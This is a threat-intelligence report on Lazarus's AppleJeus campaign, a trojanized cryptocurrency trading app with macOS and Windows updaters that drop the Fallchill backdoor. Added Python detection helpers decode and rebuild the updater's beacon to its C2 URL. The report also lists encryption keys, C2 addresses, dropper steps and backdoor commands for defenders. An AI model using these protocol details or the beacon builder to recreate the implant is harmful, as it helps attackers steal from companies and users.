Lazarus hits cryptocurrency exchange with fake installer and macOS malware

Kaspersky Lab has been assisting with incident response efforts. While investigating a cryptocurrency exchange attacked by Lazarus, we made an unexpected discovery. The victim had been infected with the help of a trojanized cryptocurrency trading application, which had been recommended to the company over email. It turned out that an unsuspecting employee of the company had willingly downloaded a third-party application from a legitimate-looking website, and their computer had been infected with malware known as Fallchill, an old tool that Lazarus has recently switched back to. There have been multiple reports on the reappearance of Fallchill, including one from US-CERT.

To ensure that the OS platform was not an obstacle to infecting targets, it seems the attackers went the extra mile and developed malware for other platforms, including macOS. A version for Linux is apparently coming soon, according to the website. This is probably the first time we have seen this APT group use malware for macOS.

The fact that the Lazarus group has expanded its list of targeted operating systems should be a wake-up call for users of non-Windows platforms.

Trojanized cryptocurrency trading application

Thanks to Kaspersky Lab’s malicious-behavior detection technology, implemented in its endpoint security software, we were able to reassemble the stages of infection and trace them back to their origin. This helped us understand that one of Lazarus’ victims was infected with malware after installing a cryptocurrency trading program. We also confirmed that the user installed this program via a download link delivered over email.

Trojanized trading application for Windows

Including malicious code into distributed software and putting that on a website would be too obvious. Instead, the attackers went for a more elaborate scheme: the trojan code was pushed out in the form of an update for a trading application.

A legitimate-looking application called Celas Trade Pro from Celas Limited showed no signs of malicious behaviour and looked genuine. This application is an all-in-one style cryptocurrency trading program developed by Celas.

Screenshot of Celas Trade Pro

When we started this research, any user could download the trading application from the Celas website. Checking the installation package downloaded from the website confirmed the presence of a very suspicious updater.

Installation package download page

We have analyzed the following Windows version of the installation package:

MD5: 9e740241ca2acdc79f30ad2c3f50990a
File name: celastradepro_win_installer_1.00.00.msi
File type: MSI installer
Creation time: 2018-06-29 01:16:00 UTC

At the end of the installation process, the installer immediately runs the Updater.exe module with the “CheckUpdate” parameter. This file looks like a regular tool and most likely will not arouse the suspicion of system administrators. After all, it even contains a valid digital signature, which belongs to the same vendor. But the devil is in the detail, as usual.

The code writer developed this project under the codename “jeus”, which was discovered in a PDB path included in the updater and is also used as the boundary string separating the parts of its HTTP multipart messages. Because of this, and the fact that the attacked platforms include Apple macOS, we decided to call this Operation AppleJeus.

Properties of the shady updater tool included in the package are:

MD5: b054a7382adf6b774b15f52d971f3799
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Known file name: %Program Files%\CelasTradePro\Updater.exe
Link Time: 2018-06-15 10:56:27 UTC
Build path: Z:\jeus\downloader\downloader_exe_vs2010\Release\dloader.pdb

The main purpose of Updater.exe is to collect the victim’s host information and send it back to the server. Upon launch, the malware creates a unique string from random values using the format string template “%09d-%05d”, which is used as a unique identifier of the infected host. The malware collects the process list, excluding the “[System Process]” and “System” processes, and reads the exact OS version from the following values under the registry key “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion”. It seems that such values only exist from Windows 10 onwards, so we assume that the author developed and tested it on Windows 10.

  • ProductName: Windows OS version
  • CurrentBuildNumber: Windows 10 build version
  • ReleaseID: Windows 10 version information
  • UBR: Sub version of Windows 10 build
  • BuildBranch: Windows 10 build branch information

The code encrypts the collected information with the hardcoded XOR key (“Moz&Wie;#t/6T!2y”) before uploading it to the server.

Data encryption routine

The code sends the victim’s information to a webserver using HTTP and the following URL:
www.celasllc[.]com/checkupdate.php

The server is a legitimate looking website owned by the developer of the program: Celas LLC. At this point we were not able to conclude with high confidence whether the server was compromised by the threat actor or had belonged to the threat actor from the beginning. To learn more about the server, please read the “Infrastructure” section below.

The malware used a hardcoded User-Agent string “Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)” and a fixed multipart form-data boundary string “jeus”.

Neither the use of encryption nor the custom boundary string would by itself be a red flag for a legitimate application, but sending a request with the context-irrelevant string “get_config”, and uploading the collected system information as “temp.gif”, mimicking a GIF image with a magic number in the header, definitely made us raise our eyebrows.

Communication with the C2 server
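The beacon described above is distinctive enough to be matched on the wire. The following is an added example (not Kaspersky’s code and not part of the original report) that scores a captured HTTP request against the traits listed here: the /checkupdate.php URI, the “jeus” multipart boundary, the two hardcoded User-Agent strings, the “get_config” field and the GIF-disguised “temp.gif” upload, and then strips the GIF header and XOR-decodes the uploaded system information so an analyst can see what left the host. Assumptions, since the report does not spell them out: the XOR is a plain repeating-key XOR with the 16-byte key quoted above, the prepended header is the bare 6-byte “GIF89a” signature, and the exact multipart layout of the constructed sample request is illustrative.

```python
"""Triage helper for the AppleJeus updater beacon (added example, not the report's code)."""

XOR_KEY = b"Moz&Wie;#t/6T!2y"   # 16-byte XOR key quoted in the report
BOUNDARY = b"jeus"              # multipart boundary quoted in the report
GIF_MAGIC = b"GIF89a"           # assumption: the bare 6-byte GIF signature is the prepended header
# User-Agent strings quoted in the report (Windows updater, then macOS updater)
KNOWN_UAS = (
    b"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)",
    b"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 "
    b"(KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36",
)


def xor_repeating(data: bytes, key: bytes = XOR_KEY) -> bytes:
    """Repeating-key XOR; assumption about the mode, the key itself is from the report."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def split_request(raw: bytes):
    """Split a raw HTTP request into (request line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def beacon_indicators(raw: bytes) -> dict:
    """Each key is one trait the report attributes to the updater's POST."""
    request_line, headers, body = split_request(raw)
    content_type = headers.get(b"content-type", b"")
    return {
        "checkupdate_uri": b"/checkupdate.php" in request_line,
        "boundary_jeus": b"boundary=" + BOUNDARY in content_type,
        "known_user_agent": headers.get(b"user-agent", b"") in KNOWN_UAS,
        "get_config_field": b"get_config" in body,
        "gif_disguised_upload": b'filename="temp.gif"' in body and GIF_MAGIC in body,
    }


def extract_upload(raw: bytes) -> bytes:
    """Return the bytes of the multipart part uploaded as temp.gif (empty if absent)."""
    _, _, body = split_request(raw)
    for part in body.split(b"--" + BOUNDARY):
        part_head, sep, part_body = part.partition(b"\r\n\r\n")
        if sep and b'filename="temp.gif"' in part_head:
            # drop only the CRLF the multipart encoder adds before the next boundary
            return part_body[:-2] if part_body.endswith(b"\r\n") else part_body
    return b""


def decode_fingerprint(raw: bytes) -> bytes:
    """Strip the fake GIF header and XOR-decode the host information."""
    blob = extract_upload(raw)
    if not blob.startswith(GIF_MAGIC):
        raise ValueError("upload does not carry the expected GIF89a header")
    return xor_repeating(blob[len(GIF_MAGIC):])


def build_sample_beacon(fingerprint: bytes, host_id: bytes = b"000123456-00042") -> bytes:
    """Constructed sample request for testing; the part layout is an assumption."""
    payload = GIF_MAGIC + xor_repeating(fingerprint)
    body = (
        b"--jeus\r\n"
        b'Content-Disposition: form-data; name="get_config"\r\n\r\n' + host_id + b"\r\n"
        b"--jeus\r\n"
        b'Content-Disposition: form-data; name="file"; filename="temp.gif"\r\n'
        b"Content-Type: image/gif\r\n\r\n" + payload + b"\r\n"
        b"--jeus--\r\n"
    )
    head = (
        b"POST /checkupdate.php HTTP/1.1\r\n"
        b"Host: www.celasllc.com\r\n"
        b"User-Agent: " + KNOWN_UAS[0] + b"\r\n"
        b"Content-Type: multipart/form-data; boundary=jeus\r\n"
        b"Content-Length: " + str(len(body)).encode() + b"\r\n"
    )
    return head + b"\r\n" + body
```

Any single indicator can occur in benign traffic; the value of the check is that a genuine beacon hits all of them at once, and the decoded upload tells the responder exactly which registry values and processes were exfiltrated.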

After successfully uploading the data, the updater checks the server response. If the server responds with HTTP code 300, the updater should keep quiet and take no action. If the response is HTTP code 200, however, it base64-decodes the payload and decrypts it using RC4 with another hardcoded key (“W29ab@ad%Df324V$Yd”). The decrypted data is an executable file prepended with the string “MAX_PATHjeusD”.
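For responders who have a captured C2 response in a pcap, the decoding chain above (status code check, base64, RC4 with the quoted key, “MAX_PATHjeusD” prefix) is easy to replay offline. The following is an added example, not code from the report: it implements RC4 itself so nothing beyond the standard library is needed, interprets a response the way the updater is described as doing, and also exposes the MD5 integrity comparison that the macOS updater described later in the report performs on the decrypted data. The placeholder payload in the constructed test vector is not a real binary.

```python
"""Decode an AppleJeus updater C2 response (added example, not the report's code)."""
import base64
import hashlib

RC4_KEY = b"W29ab@ad%Df324V$Yd"   # RC4 key quoted in the report
WIN_MARKER = b"MAX_PATHjeusD"      # prefix the report attributes to the Windows payload


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); the same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def decode_response(status: int, body: bytes) -> dict:
    """Interpret a captured response the way the report says the updater does.

    300: no task for this host. 200: base64, then RC4, then look for the marker.
    Any other status is outside the described protocol and is reported as such.
    """
    if status == 300:
        return {"kind": "no_task", "payload": None, "md5": None}
    if status != 200:
        return {"kind": "unexpected_status", "payload": None, "md5": None}
    plain = rc4(RC4_KEY, base64.b64decode(body))
    if plain.startswith(WIN_MARKER):
        kind, payload = "windows_payload", plain[len(WIN_MARKER):]
    else:
        # the report does not describe a marker for the macOS variant
        kind, payload = "opaque", plain
    return {"kind": kind, "payload": payload, "md5": hashlib.md5(payload).hexdigest()}


def verify_macos_payload(payload: bytes, expected_md5_hex: str) -> bool:
    """The macOS updater compares the MD5 of the decrypted data with a stored value."""
    return hashlib.md5(payload).hexdigest() == expected_md5_hex.lower()


def build_sample_response(payload: bytes, windows: bool = True) -> bytes:
    """Constructed test vector: package a placeholder payload the way the updater expects it."""
    plain = (WIN_MARKER if windows else b"") + payload
    return base64.b64encode(rc4(RC4_KEY, plain))
```

Because RC4 is symmetric, `build_sample_response` doubles as a way to produce a known-good test vector for a detection pipeline without touching any real sample.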

During our research, we found other similar files. One was created on August 3rd and another on August 11th. The PDB path shows that the author keeps improving this updater tool, apparently forked from some stable version released on July 2, 2018 according to the internal directory name.

Additional trojanized sample #1:

Installation package MD5: 4126e1f34cf282c354e17587bb6e8da3
Package creation date: 2018-08-03 09:57:29
Dropped updater MD5: ffae703a1e327380d85880b9037a0aeb
Updater creation date: 2018-08-03 09:50:08
Updater build path: H:\DEV\TManager\DLoader\20180702\dloader\WorkingDir\Output\00000009\Release\dloader.pdb

Additional trojanized sample #2:

Installation package MD5: 0bdb652bbe15942e866083f29fb6dd62
Package creation date: 2018-08-13 00:12:10
Dropped updater MD5: bbbcf6da5a4c352e8846bf91c3358d5c
Updater creation date: 2018-08-11 07:28:08
Updater build path: H:\DEV\TManager\DLoader\20180702\dloader\WorkingDir\Output\00000006\Release\dloader.pdb

Note the TManager directory in the PDB paths above. It will pop up again in another unexpected place later.

Trojanized trading program for macOS

For macOS users, Celas LLC also provided a native version of its trading app. A hidden “autoupdater” module is installed in the background to start immediately after installation, and after each system reboot. It keeps contacting the command and control (C2) server in order to download and run an additional executable from the server. The communication conforms to the Windows version of the updater and is disguised as an image file upload and download, while carrying encrypted data inside.

We have analyzed the following installation file:

MD5: 48ded52752de9f9b73c6bf9ae81cb429
File Size: 15,020,544 bytes
File Type: DMG disk image
Known file name: celastradepro_mac_installer_1.00.00.dmg
Date of creation: 13 July 2018

Once the Celas Trade Pro app is installed on macOS, it starts the Updater application at system load via a file named “.com.celastradepro.plist” (note that the name starts with a dot, which hides it from the Finder app and from a default Terminal directory listing). The “Updater” file is passed the “CheckUpdate” parameter on start.

Celas Trade Pro app plist file (Apple Property List)

The command-line argument “CheckUpdate” looks redundant from a code analysis perspective: there is no other argument that the application expects. In the absence of any argument, it does nothing and quits. This may or may not be a way to trick sandboxes that automatically execute this trojanized updater, since without such a “secret” extra argument no suspicious activity is produced. The choice of a benign string such as “CheckUpdate” helps it hide in plain sight from any user or administrator looking into running processes.

The trojanized updater works similarly to the Windows version in many ways. Both applications are implemented using the cross-platform Qt framework. Upon launch, the downloader creates a unique identifier for the infected host using a “%09d-%06d” format string template. Next, the app collects basic system information, which on macOS is done via dedicated Qt classes:

  • Host name
  • OS type and version
  • System architecture
  • OS kernel type and version

The process of encrypting and transferring data is the same as in the Windows version. This information is XOR-encrypted with the hardcoded 16-byte static key “Moz&Wie;#t/6T!2y”, prepended with a GIF89a header and uploaded to the C2 server via HTTP POST to the following URL:

https://www.celasllc[.]com/checkupdate.php

POST request template strings

The module relies on a hardcoded User-Agent string for macOS:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36

Once the server replies, the updater checks the HTTP response code. HTTP response code 300 indicates that the server has no task for the updater, and the application terminates immediately. If the HTTP response code is 200, the updater takes the data in the response, decodes it from base64 and decrypts it using RC4 with the hardcoded static key “W29ab@ad%Df324V$Yd”. It calculates the MD5 of the decoded and decrypted data and compares it to a value stored inside, to verify the integrity of the transferred file. After that, the payload is extracted and saved to the hardcoded file location “/var/zdiffsec”; the updater sets executable permissions for all users and starts the app with another secret hardcoded command-line argument, “bf6a0c760cc642”. Apparently the command-line argument is the way to prevent the detection of its malicious functionality via sandboxes or even reverse engineering. We have previously seen this technique adopted by the Lazarus group in 2016 in attacks against banks. As of 2018, it is still using this in almost every attack we investigated.
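The macOS persistence and payload-launch traits described above (a dot-prefixed launch plist that starts the Updater with “CheckUpdate”, and a payload at “/var/zdiffsec” started with “bf6a0c760cc642”) are concrete enough to hunt for on an endpoint. The following is an added example, not Kaspersky’s code: one function audits a launchd property list, the other audits a running process’s argument vector. Assumptions: the persistence file is a standard launchd plist with ProgramArguments and RunAtLoad keys (the report names the file but does not reproduce its contents), and the constructed sample plist, including its Label and program path, is illustrative.

```python
"""Hunt for the AppleJeus macOS persistence and payload-launch traits (added example)."""
import plistlib

HIDDEN_PLIST_NAME = ".com.celastradepro.plist"   # file name from the report
UPDATER_ARG = "CheckUpdate"                       # updater's secret argument from the report
PAYLOAD_PATH = "/var/zdiffsec"                    # payload drop location from the report
PAYLOAD_ARG = "bf6a0c760cc642"                    # payload's secret argument from the report


def audit_launch_item(plist_name: str, plist_bytes: bytes) -> list:
    """Return the traits of a launchd plist that match the report's description.

    Assumption: a standard launchd plist (ProgramArguments / RunAtLoad keys).
    """
    findings = []
    if plist_name.startswith("."):
        findings.append("dot-prefixed (hidden) plist name")
    try:
        data = plistlib.loads(plist_bytes)
    except (plistlib.InvalidFileException, ValueError):
        findings.append("unparseable plist")
        return findings
    args = data.get("ProgramArguments") or []
    if data.get("RunAtLoad"):
        findings.append("RunAtLoad set")
    if len(args) >= 2 and args[1] == UPDATER_ARG:
        findings.append("launches %s with secret argument %s" % (args[0], UPDATER_ARG))
    return findings


def audit_process(argv: list) -> list:
    """Flag a process that matches the downloaded-payload launch the report describes."""
    findings = []
    if argv and argv[0] == PAYLOAD_PATH:
        findings.append("executable at " + PAYLOAD_PATH)
    if PAYLOAD_ARG in argv[1:]:
        findings.append("secret command-line argument " + PAYLOAD_ARG)
    return findings


def build_sample_plist(program: str) -> bytes:
    """Constructed launchd plist for testing; the real file's contents are not in the report."""
    return plistlib.dumps({
        "Label": "com.celastradepro",          # assumed value
        "ProgramArguments": [program, UPDATER_ARG],
        "RunAtLoad": True,
    })
```

In practice the plist audit would be run over every file in the LaunchAgents and LaunchDaemons directories, including the dot-prefixed ones that a casual `ls` skips, and the process audit over the argument vectors of all running processes; either function returning a non-empty list is worth a ticket.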

Downloaded payload

According to data from Kaspersky Security Network, the threat actor delivered the malicious payload using one of the shadowy updaters described above. We found a malicious file created at the same host:

MD5: 0a15a33844c9df11f12a4889ae7b7e4b
File Size: 104,898,560 bytes
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Known file name: C:\Recovery\msn.exe
Link time: 2018-04-19 13:30:19

Note the unusually large size for an executable file. We believe that it was inflated with junk data on purpose to prevent easy download or transfer over the internet.

Searching for the reason for the malware’s appearance on the system revealed that an additional process had produced several files before this malware was launched, suggesting a trojan dropper in action. The main function of this malware is to implant the Fallchill backdoor loader, which is linked to several files. Upon launch, the malware checks one of the command-line arguments passed to it. As a disguise, the malware chooses one of the service names located in the following registry value:

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs

This value includes a list of several dozen standard system service names.

The randomly chosen service name is used to name the dropped file and newly registered Windows service. Let’s refer to this randomly chosen service name as [service]. The malware contains references to several files inside:

  • The file passed as argument: contains a 16-byte key
  • msncf.dat: Encrypted configuration data
  • msndll.tmp: Encrypted Fallchill loader
  • msndll.dat: Encrypted Fallchill backdoor (payload for the loader)
  • [service]svc.dll: Fallchill backdoor loader
  • [service].dat: Copy of msndll.dat

A mix of the above-mentioned files produces the final backdoor known as Fallchill. A more detailed procedure for technical specialists is as follows:

  1. Check whether the command-line argument points to a file of 16-byte size.
  2. Read the file passed via the command-line argument. The contents of this file are a crypto key, which we will call the main key.
  3. Open the msncf.dat file (configuration file). If the file size equals 192 bytes, read the content of the file.
  4. Open the msndll.tmp file and decrypt it using the main key.
  5. Create the [service]svc.dll file and fill it with pseudo-random data.
    • The malware fills the file with 10,240 bytes of pseudo-random data per iteration, and iterates (rand() % 10 + 10240) times. This is why it produces files which are at least 104,851,000 bytes.
  6. Copy the 16-byte main key to the end of the [service]svc.dll file.
  7. Encrypt the [service].dat file name with the main key and append it to the end of [service]svc.dll.
  8. Overwrite the beginning of [service]svc.dll with the data decrypted from msndll.tmp.
  9. Move the msndll.dat file to [service].dat.
  10. Delete the temporary files msndll.tmp, msncf.dat and msndll.log.
  11. Timestamp the [service]svc.dll and [service].dat files.
  12. Register [service]svc.dll as a Windows service.
  13. Save a copy of the data from the msncf.dat file in the following registry value:
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\TaskConfigs\Description

Infection process diagram

Fallchill backdoor loader

We confirmed that the following malware was created on the infected host using the method described above:

Fallchill backdoor loader:

MD5: e1ed584a672cab33af29114576ad6cce
File Size: 104,878,356 bytes
File Type: PE32+ executable (DLL) (console) x86-64, for MS Windows
Known file name: C:\Windows\system32\uploadmgrsvc.dll
Link time: 2018-01-18 01:56:32

Encrypted Fallchill backdoor:

MD5: d8484469587756ce0d10a09027044808
File Size: 143,872 bytes
File Type: encrypted data
Known file name: C:\Windows\system32\uploadmgr.dat

Upon starting, uploadmgrsvc.dll reads 276 bytes from the end of its own executable file. The first 16 bytes of this 276-byte block are used as a decryption key, and the remaining 260 bytes contain the encrypted path of the file used by the backdoor.

Data at the end of the loader module

After decrypting the last 260 bytes, the malware retrieves the name or path of the file that contains the actual backdoor body in encrypted form.
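The file layout that the dropper procedure and the loader description together imply (an inflated body of 10,240-byte pseudo-random blocks, then a 16-byte key, then a 260-byte encrypted path field) gives a forensic analyst two things to check on a suspicious service DLL: whether it carries the 276-byte trailer, and whether its bulk is high-entropy filler. The following is an added example, not Kaspersky’s code. Because the report does not describe the decryption routine, `recover_payload_path` takes the analyst’s recovered `decrypt(key, data)` as a parameter instead of inventing one; the `placeholder_xor` used to build the small constructed sample is a stand-in for testing only, not the malware’s cipher. The entropy threshold and the assumption that the path field is NUL-terminated single-byte text are mine.

```python
"""Carve the Fallchill loader trailer and test for dropper inflation (added example)."""
import math
from collections import Counter
from typing import Callable

TRAILER_LEN = 276                  # bytes the loader reads from its own end (from the report)
KEY_LEN = 16                       # first 16 bytes: decryption key (from the report)
PATH_LEN = TRAILER_LEN - KEY_LEN   # remaining 260 bytes: encrypted payload path (from the report)
MIN_INFLATED_SIZE = 104_851_000    # lower bound the report gives for the inflated loader
ENTROPY_FLOOR = 7.5                # assumption: bits/byte that separate random filler from code


def carve_trailer(image: bytes):
    """Split the last 276 bytes into (key, encrypted_path_field) as the loader does."""
    if len(image) < TRAILER_LEN:
        raise ValueError("file too small to carry the loader trailer")
    trailer = image[-TRAILER_LEN:]
    return trailer[:KEY_LEN], trailer[KEY_LEN:]


def recover_payload_path(image: bytes, decrypt: Callable[[bytes, bytes], bytes]) -> str:
    """Apply an analyst-supplied decrypt(key, data) to the trailer and return the path.

    The report does not describe the cipher, so it is a parameter, not something invented here.
    Assumption: the decrypted field is NUL-terminated single-byte text.
    """
    key, enc_path = carve_trailer(image)
    plain = decrypt(key, enc_path)
    return plain.split(b"\x00", 1)[0].decode("utf-8", errors="replace")


def shannon_entropy(chunk: bytes) -> float:
    """Bits of entropy per byte; 8.0 is uniformly random, compiled code is usually well below."""
    if not chunk:
        return 0.0
    n = len(chunk)
    return -sum(c / n * math.log2(c / n) for c in Counter(chunk).values())


def looks_inflated(size: int, middle_chunk: bytes) -> bool:
    """True when the file reaches the documented size and a window from its middle is random-looking.

    Takes the size and a sampled window so a 100 MB file need not be read whole.
    """
    return size >= MIN_INFLATED_SIZE and shannon_entropy(middle_chunk) >= ENTROPY_FLOOR


def placeholder_xor(key: bytes, data: bytes) -> bytes:
    """Stand-in cipher for building test data only; NOT the malware's routine."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def build_sample_image(path: bytes, key: bytes, encrypt: Callable, stub_len: int = 1024) -> bytes:
    """Constructed small stand-in for the loader layout: stub body + key + encrypted 260-byte field."""
    field = path.ljust(PATH_LEN, b"\x00")[:PATH_LEN]
    return b"\x00" * stub_len + key + encrypt(key, field)
```

On a real system the size check alone already separates the inflated loader from ordinary service DLLs; the entropy window guards against a benign but large DLL that happens to pass the size test.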

Decrypted file name in the end of loader module

The malware reads the specified file and decrypts it using the same decryption routine. This is how the executable code of the backdoor is produced in memory and executed by the loader. Below is the meta information about the decrypted final payload in memory:

MD5: d7089e6bc8bd137a7241a7ad297f975d
File Size: 143,872 bytes
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Link Time: 2018-03-16 07:15:31

We can summarize the Fallchill backdoor loading process as follows:

Loading the Fallchill backdoor

As mentioned previously, the final payload belongs to a Fallchill malware cluster formerly attributed to the Lazarus APT group. Upon launching, this malware resolves the API function addresses at runtime, and reads the C2 server address from the registry value created during the installation stage:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\TaskConfigs\Description

If there is no configuration value, the malware falls back to a default C2 server address.

  • 196.38.48[.]121
  • 185.142.236[.]226

This is a full-featured backdoor that contains enough functions to fully control the infected host. Some of its network protocol commands are described below.

Command ID Description
0x8000 Write current time and configuration data to registry key
0x8001 Send configuration data
0x8002 Replace configuration data in the fixed registry value
0x8003 Execute Windows command, store output in temp file and upload contents to C2
0x8006 Show current working directory
0x8007 Change current working directory
0x8008 Collect process information
0x8009 Terminate process
0x8010 Start new process
0x8011 Create process with security context of the current user
0x8012 Connect to specified host/port
0x8013 Get drive information
0x8014 Directory listing
0x8015 Search a file
0x8019 Write data to a specified file
0x8020 Read contents of specified file and upload to C2 server
0x8021 Compress multiples files to a temp file (name start with ZD) and upload to C2
0x8023 Wipe specific file
0x8025 Copy file time from another file time (timestamping)
0x8026 Shutdown malware service and self-delete
0x8043 Send “Not Service” unicode string to C2 server (communication test?).

This set of capabilities is very common for many Lazarus backdoors, which have been seen in other attacks against banks and financial industry in the past years.

Infrastructure

While working on the incident of the cryptocurrency company’s breach, we were curious about the legal status of the Celas LLC company that developed this trojanized trading application.

Celas LLC main homepage.

The website had a valid SSL certificate issued by Comodo CA. However, note that the certificate from this webserver mentions “Domain Control Validated”, which is a weak security verification level for a webserver. It does not mean validation of the identity of the website’s owner, nor of the actual existence of the business. When certification authorities issue this kind of certificate they only check that the owner has a certain control over the domain name, which can be abused in certain ways.

Below is the WHOIS record of the “celasllc.com” domain. The domain name was registered by an individual named “John Broox” with registrant email address “johnbroox200@gmail[.]com”.

The same name of “John Broox” was used inside the installation package of the macOS version of the trading application. The Info.plist properties file describes the package as follows:

It looks at first sight like a legitimate WHOIS record, but something doesn’t really add up here. The domain celasllc.com was the only domain registered with this email address, and the address was used exclusively for that domain registration.

The registrant used the Domain4Bitcoins service to register this domain, apparently paying with cryptocurrency. According to open-source intelligence, the address of the WHOIS information is fake, unless it’s the owner of a ramen shop running a cryptocurrency exchange software development studio on the side.

View of the location referred in the WHOIS record. Image source: Google Maps.

The server hosting celasllc.com (185.142.236.213) belongs to the Blackhost ISP in the Netherlands.

WHOIS record of the celasllc.com server

Coincidentally, the Fallchill malware authors also preferred to use the same hosting company to host their C2 server. Moreover, the Celas LLC web server and one of the C2 servers of the Fallchill malware are located in the same network segment of this ISP:

  • Celas LLC infrastructure:
    • 185.142.236[.]213: Netherlands Blackhost Ltd. AS174 COGENT-174
  • Fallchill malware C2 server:
    • 196.38.48[.]121: South Africa Internet Solutions AS3741
    • 185.142.236[.]226: Netherlands Blackhost Ltd. AS174 COGENT-174
  • Additional attacker’s server from telemetry
    • 80.82.64[.]91: Seychelles Incrediserve Ltd AS29073
    • 185.142.239[.]173: Netherlands Blackhost Ltd. AS174 COGENT-174

However, when you look into the Celas Trade Pro application’s digital signature, including that of its “Updater”, you will find that this certificate was also issued by Comodo CA and refers to a company address in the United States.

According to open-source data, this address doesn’t belong to a real business, and looks on maps like a meadow with a small forest and small real estate offering nearby.

Location of Celas LLC, according to its digital certificate

Real estate history of that address

Pivoting the infrastructure a little further brings up some more suspicious things. It appears that the domain referred to two IPs, one of which was linked to a few other suspicious domains, according to PassiveDNS.

Celas LLC linked infrastructure

The owners of the linked infrastructure elements preferred to use several interesting services for hosting and domain registration. All of these service providers offer a certain level of anonymity to their customers. Most of them accept Bitcoin as a main payment method to keep their customers anonymous. This is very uncommon for companies running a legitimate business.

Hosting services linked to Celas LLC:

  • Blackhost (https://black.host/)
  • Liberty VPS (https://libertyvps.net/)

Domain registration services linked to Celas LLC:

  • Domains4Bitcoins (https://www.domains4bitcoins.com/)
  • NameCheap (https://www.namecheap.com/)
  • ChangeIP (https://www.changeip.com/)
  • Njalla (https://njal.la/)

All the facts above can make the more sceptical among us doubt the intentions of Celas LLC and the legitimacy of this business. Of course, these facts alone would not be enough to accuse Celas LLC of committing a crime.

Attribution

Kaspersky Lab has previously attributed the Fallchill malware cluster to the Lazarus group when it attacked the financial sector around the world. This was also confirmed by other security vendors and by US-CERT.

RC4 key from the older Fallchill

Fallchill malware uses the RC4 algorithm with a 16-byte key to protect its communications. The key extracted from the Fallchill variant used in the current attack is DA E1 61 FF 0C 27 95 87 17 57 A4 D6 EA E3 82 2B.

Current RC4 key of Fallchill

We were able to confirm that some of older Fallchill malware variants used exactly the same RC4 key. Below are Fallchill malware samples that used the same key (the compilation timestamp may indicate the date of malware creation).

MD5 Timestamp
81c3a3c5a0129477b59397173fdc0b01 2017-05-26 23:37:04
6cb34af551b3fb63df6c9b86900cf044 2017-06-09 17:24:30
21694c8db6234df74102e8b5994b7627 2017-11-07 17:54:19
5ad7d35f0617595f26d565a3b7ebc6d0 2015-10-24 01:52:11
c501ea6c56ba9133c3c26a7d5ed4ce49 2017-06-09 03:59:43
cafda7b3e9a4f86d4bd005075040a712 2017-11-07 17:54:33
cea1a63656fb199dd5ab90528188e87c 2017-06-12 19:25:31
6b061267c7ddeb160368128a933d38be 2017-11-09 17:18:06
56f5088f488e50999ee6cced1f5dd6aa 2017-06-13 08:17:51
cd6796f324ecb7cf34bc9bc38ce4e649 2016-04-17 03:26:56

Same C2 server with older Fallchill

We have confirmed that the C2 server addresses (196.38.48[.]121, 185.142.236[.]226) used in this attack have been used by the older variant of Fallchill.

MD5 Timestamp
94dfcabd8ba5ca94828cd5a88d6ed488 2016-10-24 02:31:18
14b6d24873f19332701177208f85e776 2017-06-07 06:41:27
abec84286df80704b823e698199d89f7 2017-01-18 04:29:29

Overlap of C2 infrastructure

Apparently, the attackers using the Fallchill malware continue to reuse code and C2 server infrastructure over and over again.

According to Kaspersky Security Network, Fallchill was not the only malware used in this attack. There was another backdoor used by the threat actor. We omit a full description of this backdoor in the current report to keep the write-up to an acceptable length, but we would like to highlight two important things discovered in it. First, this backdoor was created on 2018-07-12 and revealed an already familiar directory, “TManager”, which we previously saw in the Updater.exe application from the Celas Trade Pro suite:

H:\DEV\TManager\all_BOSS_troy\T_4.2\T_4.2\Server_\x64\Release\ServerDll.pdb

Second, what is probably one of the most interesting findings to come from this additional backdoor was discovered hidden in the hardcoded headers used to communicate with the C2 server. The Accept-Language HTTP header string revealed a language code associated with North Korea. In our experience, this is something we normally don’t see in malware.

Accept-Language: ko-kp,ko-kr;q=0.8,ko;q=0.6,en-us;q=0.4,en;q=0.2

Accept-Language HTTP header value in the body of the backdoor

Conclusions

The Lazarus APT group’s continuous attacks on the financial sector are not much of a surprise to anyone. A lot of research has been done and published about such attacks. However, we think this case makes a difference. Recent investigation shows how aggressive the group is and how its strategies may evolve in the future.

First of all, Lazarus group has entered a new platform: macOS. There is steadily growing interest in macOS from ordinary users, especially in IT companies. Many developers and engineers are switching to using macOS. Apparently, in the chase after advanced users, software developers from supply chains and some high profile targets, threat actors are forced to have macOS malware tools. We believe that in the future Lazarus is going to support all platforms that software developers are using as a base platform, because compromising developers opens many doors at once.

We cannot say with full certainty whether Celas LLC was compromised and the threat actor abused it to push malware through an update mechanism. However, the multiple successful Lazarus attempts to compromise supply chain companies suggest that it will keep exploring this infection method. From all angles, the Celas LLC story looks like the threat actor has found an elaborate way to create a legitimate-looking business and inject a malicious payload into a “legitimate-looking” software update mechanism. It sounds logical: if one cannot compromise a supply chain, why not make a fake one?

